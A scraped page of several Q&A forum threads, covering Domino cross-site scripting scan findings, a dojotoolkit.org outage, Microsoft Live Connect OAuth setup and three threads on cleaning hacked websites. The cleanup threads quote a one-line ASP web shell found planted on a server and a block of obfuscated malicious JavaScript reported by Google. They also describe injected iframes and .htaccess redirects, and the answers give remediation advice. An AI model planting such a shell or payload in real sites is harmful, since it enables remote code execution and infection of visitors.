Cross site scripting in Domino? - lotus-domino

I have a Domino site that is getting highs for cross site scripting on app scan.
We don't have a license to run appscan. Another group needs to do that (yeah big corporations :) ). But I have noticed that the IE browser will complain too with a url as such:
http://myserver.com/cld/cldg.nsf/vwTOC?OpenView&Start=28
(ie will warn you on crosssite scripting with such a url).
I noticed the notes.net forum site does not come up with such an error in IE, when I try to inject script tags. I guess it must scrub the url before the page is rendered? How is this being done in the notes.net forum? Is it done at server level or a database level?
I did found this thread
How to avoid a XSP/Domino Cross-Site Scripting Vulnerability?
where Steve mentions his blog and web rules but the blog mentions that they are not needed in 8.5.4. and above. Am I understanding that right? If so we are at 8.5.4. Is there something I still need to do to scrub my url?
Edit: We are at 8.5.3. Not 8.5.4. I was mistaken. Our admin is going to try Steves's suggestions

Related

Why is dojotoolkit.org suspended?

When I go to https://dojotoolkit.org/, I get, "Unable to connect". In some browsers I get "You have reached a domain that is pending ICANN verification".
I've used a number of dojo libraries in my code. Does anyone know what happened to the owner and whether this is likely to be fixed in the near future?
If it isn't fixed, what is my best option for replacing it?
This seems to be a temporary administrative DNS issue, based on their Twitter response:
We apologize for the issues accessing the Dojo 1 web site. We’re
working on it as fast as possible. In the mean time, you can add the
IP address directly to /etc/hosts. 104.16.205.241
There are also some workarounds on the dojo gitter.im channel:
Reference guide content is also at https://github.com/dojo/docs/ And
tutorials are at
https://github.com/dojo/dojo-website/tree/master/src/documentation/tutorials
Also, as mentioned in this related question, you can use the Archive.org Wayback Machine.
The site now appears to be back up. I was able to access it and get information on features I'm using.

How to properly configure application in Live Connect and project in Visual Studio 2013

My question here is pretty simple: how to properly (and 100%) configure both Live Connect and project in Visual Studio 2013 in order for the local application run and authenticate an user properly against Microsoft account.
My question may be simple, but the answer is most likely not as simple. I've been reading countless articles and possible tutorials about this, but they are all fragmented and divided into small parts that do not really conciliate each other.
So below is the situation better described, with the steps I have followed.
[Steps Followed]
1) I have created a simple MVC application using Visual Studio 2013.
2) I have configured the project (using its properties) to use IIS Express with current Project Url : https://localhost:44302/
The project runs quite well, and external authentication with Facebook, Google and Twitter run very well too. Now for the tricky part:
3) I have created account with Microsoft and successfully created application in the Live Connect Developer Center.
4) Since configuring the field Redirect URLs to a simple http://localhost:<port> will not work (well...just because they didn't want it to, I suppose), I have additionally done the following..
5) Mapped in hosts file the following domain to localhost: # 127.0.0.1 mytestdomain.localtest.me
6) Reconfigured in Live Connect the Redirect URLs field to use the newly mapped domain: http://mytestdomain.localtest.me (although I have tried this with or without the port as well).
[End result]
With this configuration, the site runs properly locally. However, when I try to sign in with Microsoft account credentials (so, when I click the "Microsoft" button), I have redirected and received the following message:
"We're unable to complete your request
Microsoft account is experiencing technical problems. Please try again later."
I honestly do not understand why wouldn't this work, when a couple of articles suggested that doing these specific steps would make it work.
What can I be missing, why would this happen at all?
If someone can write here what am I missing and we could all join effort and create in this topic a full fledged, 100% working configuration for local application testing with Microsoft authentication, I believe it would help everyone. If such topic already exist and you can point me to it (because clearly I have missed it) it would also be great.
Thank you in advance,
Mad
Actually I just found out a proper and direct answer to my question. I totally missed it somehow during the last few days of research.
Microsoft's blog has all you need to make it work, and now mine does too. No big explanations and discussions, just basic and direct step by step article.
For those who could not find it and stumbled upon my topic here in StackOverflow, here is the link. Follow it word by word, and it will work.
Answer : Configuring your ASP.NET application for Microsoft OAuth account

I think ive been hacked and looking for advice

One of my clients noticed a message in google search results that said their website may have been hacked. After some digging, I found html files on the server that contained seo garbage and javascript references. I removed those files, change cms passwords, updated some components like CKFinder, etc...
I then started looking into other sites on the server and found tons of .asp files with this line
<%If Request("cmp")<>"" Then Execute(Request("cmp"))%>nofoundfile
I've removed those but do not know how they got there. I've looked through various logs (event viewer, website, ftp) but most don't go back far enough from when the files were created.
I've updated the OS, which was only a month or two out of date, and changed ftp access.
What else can I do to find the point of entry or make sure my server and sites are safe?
BTW: This is a windows 2003 server running IIS 6.0.
There is multiple ways that they may have gotten access to your server.
Are you running a common CMS or custom?
It could be possible that they have found a vulnerability in one of your scripts.
for example if they found a SQL injection vulnerability they could retrive database information.
if they where to find a RCE bug (remote code execution) they maybe have been able to execute system commands leading to the creating of those arbitrary files.
Other than that, there are a few vulnerabilities in windows server that have been patched this week, check out this link :
http://blog.spiderlabs.com/2014/02/microsoft-patch-tuesday-february-2014.html

Malware on the site as per google but I cannot find it

yesterday when I came to one of my sites I got a warning from google that there is malware on my site. I looked at the code and there was indeed some javascript that shouldn't be there. I googled it and didn't find anything usefull. When I came back to my site, that code was gone, but google (when accessing the site from the search engine) and google chrome still give me a warning that there is malware on my site.
I looked at webmaster tools and they have identified few pages as problematic. One of them is http://www.keramikfliesen.com/schweiz/rimini/. The code that is listed in the webmaster tools under Malware is:
<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b#%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^#$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!#!?
^+^]^!^$+*^&^#!&&<!$$|&^^]&_&*!!$|++&<!+&*^#&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^#&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$#!?^+$:^#&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*^]&!
^<$#$$^]$$$#&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$#$$^#&*!?!|&:!$&*!^^]$$$#&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$#
$$^#!|&<!+&?^]$~$$^#&!^^^]$$&?!+!+!|^#$~$~$$$#!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$#$$$~!+
&~!|^$$_&?!+&]&)$$^#!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!#!]^#&?$_!|!$&~!+&~!+!:!|&*^]!#&$^#&&!*&_&^!+&:&~&_$?$:!#
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!#!&&<!$$|&&^]
&+&~
Can you please help me out? How should I fight this?
Thank you all very much for your help in advance!
Remove the malware from your webpages.
Immediately change your passwords.
Also check for any XSS (cross-site scripting) and SQL injection vulnerabilities.
deactivate plugins that are not high ranked or from reputed source.
Use secure protocols.check out StopBadware.org's Tips for Cleaning and Securing Your Website.
Keep an eye on your log files.
Stay up-to-date with the latest software updates and patches.
Hope it helps!
If the code appears again, then the attacker left some script, which, on request, runs the infecting procedure. Usually this script receives an encoded string of the malcode (e.g. in base64), decodes it and executes via eval(). You should find this file (it is most likely a PHP script) and remove it. To find it look at the log and search for suspicious requests (e.g. a single POST request, transmitting base64 string is a very suspicious one).
Most probably your hosting has been compromised (password stolen) by an automated tool.
This tools typically inject some javascript inside js files in order to infect the people visiting your pages with malware. You should :
Change your passwords.
Restore the most recent non compromised backup.

Apache attack on compromised server, iframe injected by string replace

My server has been compromised recently. This morning, I have discovered that the intruder is injecting an iframe into each of my HTML pages. After testing, I have found out that the way he does that is by getting Apache (?) to replace every instance of
<body>
by
<iframe link to malware></iframe></body>
For example if I browse a file residing on the server consisting of:
</body>
</body>
Then my browser sees a file consisting of:
<iframe link to malware></iframe></body>
<iframe link to malware></iframe></body>
I have immediately stopped Apache to protect my visitors, but so far I have not been able to find what the intruder has changed on the server to perform the attack. I presume he has modified an Apache config file, but I have no idea which one. In particular, I have looked for recently modified files by time-stamp, but did not find anything noteworthy.
Thanks for any help.
Tuan.
PS: I am in the process of rebuilding a new server from scratch, but in the while, I would like to keep the old one running, since this is a business site.
I don't know the details of your compromised server. While this is a fairly standard drive-by attack against Apache that you can, ideally, resolve by rolling back to a previous version of your web content and server configuration (if you have a colo, contact the technical team responsible for your backups), let's presume you're entirely on your own and need to fix the problem yourself.
Pulling from StopBadware.org's documentation on the most common drive-by scenarios and resolution cases:
Malicious scripts
Malicious scripts are often used to redirect site visitors to a
different website and/or load badware from another source. These
scripts will often be injected by an attacker into the content of your
web pages, or sometimes into other files on your server, such as
images and PDFs. Sometimes, instead of injecting the entire script
into your web pages, the attacker will only inject a pointer to a .js
or other file that the attacker saves in a directory on your web
server.
Many malicious scripts use obfuscation to make them more difficult for
anti-virus scanners to detect:
Some malicious scripts use names that look like they’re coming from
legitimate sites (note the misspelling of “analytics”):
.htaccess redirects
The Apache web server, which is used by many hosting providers, uses a
hidden server file called .htaccess to configure certain access
settings for directories on the website. Attackers will sometimes
modify an existing .htaccess file on your web server or upload new
.htaccess files to your web server containing instructions to redirect
users to other websites, often ones that lead to badware downloads or
fraudulent product sales.
Hidden iframes
An iframe is a section of a web page that loads content from another
page or site. Attackers will often inject malicious iframes into a web
page or other file on your server. Often, these iframes will be
configured so they don’t show up on the web page when someone visits
the page, but the malicious content they are loading will still load,
hidden from the visitor’s view.
How to look for it
If your site was reported as a badware site by Google, you can use
Google’s Webmaster Tools to get more information about what was
detected. This includes a sampling of pages on which the badware was
detected and, using a Labs feature, possibly even a sample of the bad
code that was found on your site. Certain information can also be
found on the Google Diagnostics page, which can be found by replacing
example.com in the following URL with your own site’s URL:
www.google.com/safebrowsing/diagnostic?site=example.com
There exist several free and paid website scanning services on the
Internet that can help you zero in on specific badware on your site.
There are also tools that you can use on your web server and/or on a
downloaded copy of the files from your website to search for specific
text. StopBadware does not list or recommend such services, but the
volunteers in our online community will be glad to point you to their
favorites.
In short, use the stock-standard tools and scanners provided by Google first. If the threat can't otherwise be identified, you'll need to backpath through the code of your CMS, Apache configuration, SQL setup, and remaining content of your website to determine where you were compromised and what the right remediation steps should be.
Best of luck handling your issue!